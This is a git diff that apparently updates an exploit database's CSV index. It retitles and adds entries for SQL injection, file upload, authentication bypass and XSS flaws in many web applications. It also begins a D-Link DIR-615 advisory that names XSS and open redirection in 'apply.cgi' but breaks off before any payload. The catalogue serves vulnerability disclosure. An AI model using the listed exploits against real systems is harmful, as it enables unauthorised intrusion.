@@ -22387,16 +22390,16 @@ id,file,description,date,author,platform,type,port 11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,php,webapps,0 11341,platforms/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,cp77fk4r,php,webapps,0 11344,platforms/php/webapps/11344.txt,"WSN Guest - Database Disclosure",2010-02-07,HackXBack,php,webapps,0 -11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0 -11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0 +11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0 +11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0 11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0 11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 - (articlemodule) SQL Injection",2010-02-07,"T u R c O",php,webapps,0 11350,platforms/php/webapps/11350.txt,"Belkatalog CMS - SQL Injection",2010-02-07,anonymous,php,webapps,0 11352,platforms/php/webapps/11352.txt,"Joomla! 
Component com_productbook - SQL Injection",2010-02-07,snakespc,php,webapps,0 11353,platforms/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-07,"Milos Zivanovic",php,webapps,0 -11354,platforms/php/webapps/11354.txt,"Killmonster 2.1 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0 +11354,platforms/php/webapps/11354.txt,"Killmonster 2.1 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0 11355,platforms/php/webapps/11355.txt,"EncapsCMS 0.3.6 - (config[path]) Remote File Inclusion",2010-02-07,cr4wl3r,php,webapps,0 -11356,platforms/php/webapps/11356.txt,"Rostermain 1.1 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0 +11356,platforms/php/webapps/11356.txt,"Rostermain 1.1 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0 11357,platforms/php/webapps/11357.txt,"Uiga Business Portal - SQL Injection / Cross-Site Scripting",2010-02-07,"Sioma Labs",php,webapps,0 11358,platforms/php/webapps/11358.txt,"TinyMCE WYSIWYG Editor - Multiple Vulnerabilities",2010-02-07,mc2_s3lector,php,webapps,0 11359,platforms/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Inclusion",2010-02-08,"Hamza 'MizoZ' N.",php,webapps,0 
@@ -22404,7 +22407,7 @@ id,file,description,date,author,platform,type,port 11361,platforms/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure",2010-02-09,ViRuSMaN,asp,webapps,0 11365,platforms/php/webapps/11365.txt,"CPA Site Solutions - Arbitrary File Upload",2010-02-09,R3VAN_BASTARD,php,webapps,0 11366,platforms/php/webapps/11366.txt,"NewsLetter Tailor - Database Backup Dump",2010-02-09,ViRuSMaN,php,webapps,0 -11367,platforms/php/webapps/11367.txt,"NewsLetter Tailor - (Authentication Bypass) SQL Injection",2010-02-09,ViRuSMaN,php,webapps,0 +11367,platforms/php/webapps/11367.txt,"NewsLetter Tailor - Authentication Bypass",2010-02-09,ViRuSMaN,php,webapps,0 11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,HackXBack,php,webapps,0 11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,cp77fk4r,asp,webapps,0 11375,platforms/php/webapps/11375.txt,"Zomorrod CMS - SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0 
@@ -22440,7 +22443,7 @@ id,file,description,date,author,platform,type,port 11430,platforms/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,php,webapps,0 11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Arbitrary File Upload",2010-02-13,Phenom,php,webapps,0 11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0 -11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - (orderlinks) SQL Injection",2010-02-13,Gamoscu,php,webapps,0 +11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - 'orderlinks' Parameter SQL Injection",2010-02-13,Gamoscu,php,webapps,0 11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0 11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 
@@ -22532,23 +22535,23 @@ id,file,description,date,author,platform,type,port 11580,platforms/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,ViRuSMaN,aix,webapps,0 11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - news.php SQL Injection",2010-02-27,"Easy Laster",php,webapps,0 11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 Beta (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0 -11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,cr4wl3r,php,webapps,0 +11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps,0 11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,cr4wl3r,php,webapps,0 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,cr4wl3r,php,webapps,0 11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusion",2010-02-27,cr4wl3r,php,webapps,0 11588,platforms/php/webapps/11588.txt,"phpMySite - Cross-Site Scripting / SQL Injection",2010-02-27,Crux,php,webapps,0 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,asp,webapps,0 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory - SQL Injection",2010-02-27,Crux,php,webapps,0 -11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,cr4wl3r,php,webapps,0 +11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps,0 11595,platforms/php/webapps/11595.php,"Joomla! 
Component com_paxgallery - Blind Injection",2010-02-27,snakespc,php,webapps,0 11596,platforms/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,indoushka,php,webapps,0 11599,platforms/php/webapps/11599.txt,"Uiga Personal Portal - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps,0 11600,platforms/php/webapps/11600.txt,"Uiga Fan Club - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps,0 -11602,platforms/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - (Authentication Bypass) SQL Injection",2010-02-28,cr4wl3r,php,webapps,0 +11602,platforms/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - Authentication Bypass",2010-02-28,cr4wl3r,php,webapps,0 11603,platforms/php/webapps/11603.txt,"Joomla! Component com_yanc - SQL Injection",2010-02-28,snakespc,php,webapps,0 11604,platforms/php/webapps/11604.php,"Joomla! Component com_liveticker - Blind SQL Injection",2010-02-28,snakespc,php,webapps,0 11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri 2.1 - SQL Injection",2010-02-28,cr4wl3r,php,webapps,0 -11606,platforms/asp/webapps/11606.txt,"Majoda CMS - (Authentication Bypass) SQL Injection",2010-02-28,Phenom,asp,webapps,0 +11606,platforms/asp/webapps/11606.txt,"Majoda CMS - Authentication Bypass",2010-02-28,Phenom,asp,webapps,0 11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - 'id' SQL Injection",2010-03-01,kaMtiEz,php,webapps,0 11610,platforms/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0 11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti - Database Download",2010-03-02,indoushka,asp,webapps,0 
@@ -22688,7 +22691,7 @@ id,file,description,date,author,platform,type,port 11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0 11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0 11832,platforms/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0 -11833,platforms/php/webapps/11833.txt,"4x CMS r26 - (Authentication Bypass) SQL Injection",2010-03-21,cr4wl3r,php,webapps,0 +11833,platforms/php/webapps/11833.txt,"4x CMS r26 - Authentication Bypass",2010-03-21,cr4wl3r,php,webapps,0 11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - Authentication Bypass",2010-03-22,cr4wl3r,php,webapps,0 11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0 14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0 
@@ -22768,8 +22771,8 @@ id,file,description,date,author,platform,type,port 11951,platforms/php/webapps/11951.txt,"E-book Store - Multiple Vulnerabilities (1)",2010-03-30,indoushka,php,webapps,0 11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps,0 11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusion",2010-03-30,mat,php,webapps,0 -11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - (Authentication Bypass) SQL Injection",2010-03-30,indoushka,php,webapps,0 -11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - (Authentication Bypass) SQL Injection",2010-03-30,mat,php,webapps,0 +11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - Authentication Bypass",2010-03-30,indoushka,php,webapps,0 +11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - Authentication Bypass",2010-03-30,mat,php,webapps,0 11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection",2010-03-30,"Easy Laster",multiple,webapps,0 11965,platforms/php/webapps/11965.txt,"kora - Reinstall Admin Information",2010-03-30,indoushka,php,webapps,0 11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Arbitrary File Upload",2010-03-30,indoushka,php,webapps,0 
@@ -22958,7 +22961,7 @@ id,file,description,date,author,platform,type,port 12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0 12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0 -12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - (Authentication Bypass) SQL Injection",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 +12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0 12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0 12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0 
@@ -23231,11 +23234,11 @@ id,file,description,date,author,platform,type,port 12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal)",2010-05-21,"Richard Brain",windows,webapps,0 12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0 -12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0 +12686,platforms/php/webapps/12686.txt,"Online University - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps,0 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0 -12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0 +12691,platforms/php/webapps/12691.txt,"Online Job Board - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 12692,platforms/php/webapps/12692.txt,"WordPress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0 
@@ -24007,7 +24010,7 @@ id,file,description,date,author,platform,type,port 15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - Blind SQL Injection",2010-09-27,**RoAd_KiLlEr**,php,webapps,0 15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection",2010-09-28,"High-Tech Bridge SA",php,webapps,0 15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps,0 -15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass (via SQL Injection)",2010-09-28,Abysssec,php,webapps,0 +15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,php,webapps,0 15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQL Injection) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0 15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Flaws",2010-09-28,"Pablo Milano",php,webapps,0 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0 
@@ -24827,7 +24830,7 @@ id,file,description,date,author,platform,type,port 17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0 17556,platforms/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0 17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0 -17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 +17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 17570,platforms/php/webapps/17570.txt,"MusicBox 3.7 - Multiple Vulnerabilities",2011-07-25,R@1D3N,php,webapps,0 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0 
@@ -25449,7 +25452,7 @@ id,file,description,date,author,platform,type,port 18999,platforms/php/webapps/18999.php,"SN News 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 19012,platforms/php/webapps/19012.txt,"WordPress Plugin Front File Manager 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 19013,platforms/php/webapps/19013.txt,"WordPress Plugin Easy Contact Forms Export 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19005,platforms/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass (SQL Injection)",2012-06-07,"Yakir Wizman",php,webapps,0 +19005,platforms/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass",2012-06-07,"Yakir Wizman",php,webapps,0 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",php,webapps,0 19007,platforms/php/webapps/19007.php,"PHPNet 1.8 - (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 19008,platforms/php/webapps/19008.php,"WordPress Plugin Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 
@@ -27012,7 +27015,7 @@ id,file,description,date,author,platform,type,port 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,cr4wl3r,php,webapps,0 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0 -24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection",2013-02-21,cr4wl3r,php,webapps,0 +24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - Authentication Bypass",2013-02-21,cr4wl3r,php,webapps,0 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 
@@ -28611,7 +28614,7 @@ id,file,description,date,author,platform,type,port 26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel and lukman",php,webapps,0 26868,platforms/php/webapps/26868.txt,"jPORTAL 2.2.1/2.3 Forum - 'forum.php' SQL Injection",2005-12-19,Zbigniew,php,webapps,0 26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0 -26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0 +26871,platforms/php/webapps/26871.txt,"PlaySms 0.8 - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps,0 26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - 'ID' Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0 26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0 
@@ -29544,7 +29547,7 @@ id,file,description,date,author,platform,type,port 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 -28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass (SQL Injection)",2013-09-06,shiZheni,php,webapps,0 +28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass",2013-09-06,shiZheni,php,webapps,0 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0 28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 
@@ -30217,6 +30220,7 @@ id,file,description,date,author,platform,type,port 29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - blog.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0 +41035,platforms/php/webapps/41035.txt,"Airbnb Clone Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0 29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - db_create.php db Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 
@@ -35326,7 +35330,7 @@ id,file,description,date,author,platform,type,port 37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0 37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0 37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,php,webapps,0 -37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Authentication Bypass) SQL Injection",2015-06-15,"walid naceri",php,webapps,0 +37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - Authentication Bypass",2015-06-15,"walid naceri",php,webapps,0 37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion",2012-05-27,n4ss1m,php,webapps,0 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0 37331,platforms/php/webapps/37331.py,"WHMCS - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0 
@@ -36743,7 +36747,7 @@ id,file,description,date,author,platform,type,port 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80 40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000 -40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80 +40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80 40220,platforms/php/webapps/40220.txt,"WordPress Plugin Add From Server < 3.3.2 - Cross-Site Request Forgery (Arbitrary File Upload)",2016-08-08,"Edwin Molenaar",php,webapps,80 40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery",2016-08-10,hyp3rlinx,php,webapps,80 40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80 
@@ -36960,8 +36964,17 @@ id,file,description,date,author,platform,type,port
 41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
 41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
 41009,platforms/php/webapps/41009.txt,"Starting Page 1.3 - 'category' Parameter SQL Injection",2017-01-11,"Ben Lee",php,webapps,0
-41010,platforms/php/webapps/41010.txt,"My link trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
+41010,platforms/php/webapps/41010.txt,"My Link Trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
+41011,platforms/php/webapps/41011.txt,"b2evolution 6.8.2 - Arbitrary File Upload",2016-12-29,"Li Fei",php,webapps,0
 41014,platforms/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps,0
 41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
 41023,platforms/php/webapps/41023.txt,"Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
 41024,platforms/php/webapps/41024.txt,"Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
+41028,platforms/php/webapps/41028.txt,"Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
+41029,platforms/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
+41032,platforms/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection",2017-01-11,v3n0m,php,webapps,0
+41033,platforms/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",hardware,webapps,0
+41034,platforms/php/webapps/41034.txt,"School Management Software 2.75 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0 +41036,platforms/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0 +41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0 +41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/hardware/webapps/41033.txt b/platforms/hardware/webapps/41033.txt new file mode 100755 index 000000000..795733402 --- /dev/null +++ b/platforms/hardware/webapps/41033.txt @@ -0,0 +1,83 @@ +# Title: D-Link DIR-615 Multiple Vulnerabilities +# Date: 10-01-2017 +# Hardware Version: E3 +# Firmware Version: 5.10 +# Tested on: Windows 8 64-bit +# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith) +# Original write-up:https://osandamalith.com/2017/01/04/d-link-dir-615-open-redirection-and-xss/ + +Overview +-------- + +The 'apply.cgi' file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in 'apply.cgi'. For example the 'ping_response.cgi' file. + +Open Redirection +----------------- +# apply.cgi + + + +
